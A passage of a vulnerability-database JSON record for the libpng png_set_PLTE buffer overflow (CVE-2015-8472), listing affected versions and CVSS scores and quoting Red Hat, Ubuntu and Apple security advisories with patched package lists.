"cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.6.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.5.19:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.5.18:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.5.11:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.5.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.5.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.5.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.4.12:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.4.11:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.4.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.4.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.51:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.50:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.42:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.41:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.35:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.34:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.28:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.27:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.26:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.19:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.12:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.11:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.32:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.25:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.24:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.18:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.17:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.4.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.53:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.52:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.44:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.43:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.37:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.36:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.29:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.21:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.20:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.14:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.13:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.6.16:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.6.15:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.6.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.6.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.5.24:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.5.22:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.5.15:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.5.14:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.5.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.5.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.4.16:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.4.15:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.4.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.4.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.4.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.54:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.46:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.45:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.39:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.38:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.31:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.30:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.23:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.22:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.16:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.15:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.0.64:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2015-8472" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Red Hat", "sources": [ { "db": "PACKETSTORM", "id": "135555" }, { "db": "PACKETSTORM", "id": "135556" }, { "db": "PACKETSTORM", "id": "135557" }, { "db": "PACKETSTORM", "id": "134719" }, { "db": "PACKETSTORM", "id": "137932" }, { "db": "PACKETSTORM", "id": "135341" } ], "trust": 0.6 }, "cve": "CVE-2015-8472", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "trust": 1.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 7.5, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2015-8472", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "High", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-86433", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "exploitabilityScore": 3.9, "impactScore": 3.4, "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.0" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "Low", "baseScore": 7.3, "baseSeverity": "High", "confidentialityImpact": "Low", "exploitabilityScore": null, "id": "CVE-2015-8472", "impactScore": null, "integrityImpact": "Low", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2015-8472", "trust": 1.8, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201512-189", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-86433", "trust": 0.1, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2015-8472", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-86433" }, { "db": "VULMON", "id": "CVE-2015-8472" }, { "db": "JVNDB", "id": "JVNDB-2015-006846" }, { "db": "CNNVD", "id": "CNNVD-201512-189" }, { "db": "NVD", "id": "CVE-2015-8472" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer overflow in the png_set_PLTE function in libpng before 1.0.65, 1.1.x and 1.2.x before 1.2.55, 1.3.x, 1.4.x before 1.4.18, 1.5.x before 1.5.25, and 1.6.x before 1.6.20 allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a small bit-depth value in an IHDR (aka image header) chunk in a PNG image. NOTE: this vulnerability exists because of an incomplete fix for CVE-2015-8126. libpng of png_set_PLTE The function contains a buffer overflow vulnerability. The following versions are affected: libpng prior to 1.0.65, 1.1.x and 1.2.x prior to 1.2.55, 1.3.x, 1.4.x prior to 1.4.18, 1.5.x prior to 1.5.25, 1.6 1.6.x versions prior to .20. 5) - i386, ppc, s390x, x86_64\n\n3. Description:\n\nIBM Java SE version 7 Release 1 includes the IBM Java Runtime Environment\nand the IBM Java Software Development Kit. \n\nThis update fixes several vulnerabilities in the IBM Java Runtime\nEnvironment and the IBM Java Software Development Kit. Further information\nabout these flaws can be found on the IBM Java Security alerts page, listed\nin the References section. (CVE-2015-5041, CVE-2015-7575, CVE-2015-7981,\nCVE-2015-8126, CVE-2015-8472, CVE-2015-8540, CVE-2016-0402, CVE-2016-0448,\nCVE-2016-0466, CVE-2016-0483, CVE-2016-0494)\n\nNote: This update also disallows the use of the MD5 hash algorithm in the\ncertification path processing. The use of MD5 can be re-enabled by removing\nMD5 from the jdk.certpath.disabledAlgorithms security property defined in\nthe java.security file. All running\ninstances of IBM Java must be restarted for the update to take effect. Bugs fixed (https://bugzilla.redhat.com/):\n\n1276416 - CVE-2015-7981 libpng: Out-of-bounds read in png_convert_to_rfc1123\n1281756 - CVE-2015-8126 CVE-2015-8472 libpng: Buffer overflow vulnerabilities in png_get_PLTE/png_set_PLTE functions\n1289841 - CVE-2015-7575 TLS 1.2 Transcipt Collision attacks against MD5 in key exchange protocol (SLOTH)\n1291312 - CVE-2015-8540 libpng: underflow read in png_check_keyword()\n1298906 - CVE-2016-0494 ICU: integer signedness issue in IndicRearrangementProcessor (OpenJDK 2D, 8140543)\n1298957 - CVE-2016-0402 OpenJDK: URL deserialization inconsistencies (Networking, 8059054)\n1299073 - CVE-2016-0448 OpenJDK: logging of RMI connection secrets (JMX, 8130710)\n1299385 - CVE-2016-0466 OpenJDK: insufficient enforcement of totalEntitySizeLimit (JAXP, 8133962)\n1299441 - CVE-2016-0483 OpenJDK: incorrect boundary check in JPEG decoder (AWT, 8139017)\n1302689 - CVE-2015-5041 IBM JDK: J9 JVM allows code to invoke non-public interface methods\n\n6. ============================================================================\nUbuntu Security Notice USN-2861-1\nJanuary 06, 2016\n\nlibpng vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 15.10\n- Ubuntu 15.04\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nlibpng could be made to crash or run programs as your login if it opened a\nspecially crafted file. (CVE-2015-8472)\n\nQixue Xiao and Chen Yu discovered that libpng incorrectly handled certain\nmalformed images. (CVE-2015-8540)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 15.10:\n libpng12-0 1.2.51-0ubuntu3.15.10.2\n\nUbuntu 15.04:\n libpng12-0 1.2.51-0ubuntu3.15.04.2\n\nUbuntu 14.04 LTS:\n libpng12-0 1.2.50-1ubuntu2.14.04.2\n\nUbuntu 12.04 LTS:\n libpng12-0 1.2.46-3ubuntu4.2\n\nAfter a standard system update you need to restart your session to make\nall the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: libpng12 security update\nAdvisory ID: RHSA-2015:2595-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-2595.html\nIssue date: 2015-12-09\nCVE Names: CVE-2015-7981 CVE-2015-8126 CVE-2015-8472 \n=====================================================================\n\n1. Summary:\n\nUpdated libpng12 packages that fix three security issues are now available\nfor Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which\ngive detailed severity ratings, are available for each vulnerability\nfrom the CVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nThe libpng12 packages contain a library of functions for creating and\nmanipulating PNG (Portable Network Graphics) image format files. \n\nIt was discovered that the png_get_PLTE() and png_set_PLTE() functions of\nlibpng did not correctly calculate the maximum palette sizes for bit depths\nof less than 8. In case an application tried to use these functions in\ncombination with properly calculated palette sizes, this could lead to a\nbuffer overflow or out-of-bounds reads. An attacker could exploit this to\ncause a crash or potentially execute arbitrary code by tricking an\nunsuspecting user into processing a specially crafted PNG image. However,\nthe exact impact is dependent on the application using the library. An attacker could possibly use this flaw to cause an\nout-of-bounds read by tricking an unsuspecting user into processing a\nspecially crafted PNG image. (CVE-2015-7981)\n\nAll libpng12 users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nlibpng12-1.2.50-7.el7_2.src.rpm\n\nx86_64:\nlibpng12-1.2.50-7.el7_2.i686.rpm\nlibpng12-1.2.50-7.el7_2.x86_64.rpm\nlibpng12-debuginfo-1.2.50-7.el7_2.i686.rpm\nlibpng12-debuginfo-1.2.50-7.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nlibpng12-debuginfo-1.2.50-7.el7_2.i686.rpm\nlibpng12-debuginfo-1.2.50-7.el7_2.x86_64.rpm\nlibpng12-devel-1.2.50-7.el7_2.i686.rpm\nlibpng12-devel-1.2.50-7.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nlibpng12-1.2.50-7.el7_2.src.rpm\n\nx86_64:\nlibpng12-1.2.50-7.el7_2.i686.rpm\nlibpng12-1.2.50-7.el7_2.x86_64.rpm\nlibpng12-debuginfo-1.2.50-7.el7_2.i686.rpm\nlibpng12-debuginfo-1.2.50-7.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nlibpng12-debuginfo-1.2.50-7.el7_2.i686.rpm\nlibpng12-debuginfo-1.2.50-7.el7_2.x86_64.rpm\nlibpng12-devel-1.2.50-7.el7_2.i686.rpm\nlibpng12-devel-1.2.50-7.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nlibpng12-1.2.50-7.el7_2.src.rpm\n\naarch64:\nlibpng12-1.2.50-7.el7_2.aarch64.rpm\nlibpng12-debuginfo-1.2.50-7.el7_2.aarch64.rpm\n\nppc64:\nlibpng12-1.2.50-7.el7_2.ppc.rpm\nlibpng12-1.2.50-7.el7_2.ppc64.rpm\nlibpng12-debuginfo-1.2.50-7.el7_2.ppc.rpm\nlibpng12-debuginfo-1.2.50-7.el7_2.ppc64.rpm\n\nppc64le:\nlibpng12-1.2.50-7.el7_2.ppc64le.rpm\nlibpng12-debuginfo-1.2.50-7.el7_2.ppc64le.rpm\n\ns390x:\nlibpng12-1.2.50-7.el7_2.s390.rpm\nlibpng12-1.2.50-7.el7_2.s390x.rpm\nlibpng12-debuginfo-1.2.50-7.el7_2.s390.rpm\nlibpng12-debuginfo-1.2.50-7.el7_2.s390x.rpm\n\nx86_64:\nlibpng12-1.2.50-7.el7_2.i686.rpm\nlibpng12-1.2.50-7.el7_2.x86_64.rpm\nlibpng12-debuginfo-1.2.50-7.el7_2.i686.rpm\nlibpng12-debuginfo-1.2.50-7.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\naarch64:\nlibpng12-debuginfo-1.2.50-7.el7_2.aarch64.rpm\nlibpng12-devel-1.2.50-7.el7_2.aarch64.rpm\n\nppc64:\nlibpng12-debuginfo-1.2.50-7.el7_2.ppc.rpm\nlibpng12-debuginfo-1.2.50-7.el7_2.ppc64.rpm\nlibpng12-devel-1.2.50-7.el7_2.ppc.rpm\nlibpng12-devel-1.2.50-7.el7_2.ppc64.rpm\n\nppc64le:\nlibpng12-debuginfo-1.2.50-7.el7_2.ppc64le.rpm\nlibpng12-devel-1.2.50-7.el7_2.ppc64le.rpm\n\ns390x:\nlibpng12-debuginfo-1.2.50-7.el7_2.s390.rpm\nlibpng12-debuginfo-1.2.50-7.el7_2.s390x.rpm\nlibpng12-devel-1.2.50-7.el7_2.s390.rpm\nlibpng12-devel-1.2.50-7.el7_2.s390x.rpm\n\nx86_64:\nlibpng12-debuginfo-1.2.50-7.el7_2.i686.rpm\nlibpng12-debuginfo-1.2.50-7.el7_2.x86_64.rpm\nlibpng12-devel-1.2.50-7.el7_2.i686.rpm\nlibpng12-devel-1.2.50-7.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nlibpng12-1.2.50-7.el7_2.src.rpm\n\nx86_64:\nlibpng12-1.2.50-7.el7_2.i686.rpm\nlibpng12-1.2.50-7.el7_2.x86_64.rpm\nlibpng12-debuginfo-1.2.50-7.el7_2.i686.rpm\nlibpng12-debuginfo-1.2.50-7.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nlibpng12-debuginfo-1.2.50-7.el7_2.i686.rpm\nlibpng12-debuginfo-1.2.50-7.el7_2.x86_64.rpm\nlibpng12-devel-1.2.50-7.el7_2.i686.rpm\nlibpng12-devel-1.2.50-7.el7_2.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-7981\nhttps://access.redhat.com/security/cve/CVE-2015-8126\nhttps://access.redhat.com/security/cve/CVE-2015-8472\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD4DBQFWaEOWXlSAg2UNWIIRArqQAJiXHpRTjePlByUwb2yeLtnA6ZHDAJ483rVP\nN/LWwsGEwId3XWZYVPOUSQ==\n=s2GT\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. (CVE-2015-4734, CVE-2015-4803, CVE-2015-4805,\nCVE-2015-4806, CVE-2015-4810, CVE-2015-4835, CVE-2015-4840, CVE-2015-4842,\nCVE-2015-4843, CVE-2015-4844, CVE-2015-4860, CVE-2015-4871, CVE-2015-4872,\nCVE-2015-4882, CVE-2015-4883, CVE-2015-4893, CVE-2015-4902, CVE-2015-4903,\nCVE-2015-5006, CVE-2015-5041, CVE-2015-7575, CVE-2015-7981, CVE-2015-8126,\nCVE-2015-8472, CVE-2015-8540, CVE-2016-0264, CVE-2016-0363, CVE-2016-0376,\nCVE-2016-0402, CVE-2016-0448, CVE-2016-0466, CVE-2016-0483, CVE-2016-0494,\nCVE-2016-0686, CVE-2016-0687, CVE-2016-3422, CVE-2016-3426, CVE-2016-3427,\nCVE-2016-3443, CVE-2016-3449)\n\nRed Hat would like to thank Andrea Palazzo of Truel IT for reporting the\nCVE-2015-4806 issue. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2016-03-21-5 OS X El Capitan 10.11.4 and Security Update\n2016-002\n\nOS X El Capitan 10.11.4 and Security Update 2016-002 is now available\nand addresses the following:\n\napache_mod_php\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted .png file may lead to\narbitrary code execution\nDescription: Multiple vulnerabilities existed in libpng versions\nprior to 1.6.20. These were addressed by updating libpng to version\n1.6.20. \nCVE-ID\nCVE-2015-8126 : Adam Mari\u0161\nCVE-2015-8472 : Adam Mari\u0161\n\nAppleRAID\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1733 : Proteas of Qihoo 360 Nirvan Team\n\nAppleRAID\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A local user may be able to determine kernel memory layout\nDescription: An out-of-bounds read issue existed that led to the\ndisclosure of kernel memory. This was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1732 : Proteas of Qihoo 360 Nirvan Team\n\nAppleUSBNetworking\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue existed in the parsing of\ndata from USB devices. This issue was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1734 : Andrea Barisani and Andrej Rosano of Inverse Path\n\nBluetooth\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1735 : Jeonghoon Shin@A.D.D\nCVE-2016-1736 : beist and ABH of BoB\n\nCarbon\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted .dfont file may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues existed in the\nhandling of font files. These issues were addressed through improved\nbounds checking. \nCVE-ID\nCVE-2016-1737 : an anonymous researcher\n\ndyld\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An attacker may tamper with code-signed applications to\nexecute arbitrary code in the application\u0027s context\nDescription: A code signing verification issue existed in dyld. This\nissue was addressed with improved validation. \nCVE-ID\nCVE-2016-1738 : beist and ABH of BoB\n\nFontParser\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Opening a maliciously crafted PDF file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2016-1740 : HappilyCoded (ant4g0nist and r3dsm0k3) working with\nTrend Micro\u0027s Zero Day Initiative (ZDI)\n\nHTTPProtocol\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple vulnerabilities existed in nghttp2 versions\nprior to 1.6.0, the most serious of which may have led to remote code\nexecution. These were addressed by updating nghttp2 to version 1.6.0. \nCVE-ID\nCVE-2015-8659\n\nIntel Graphics 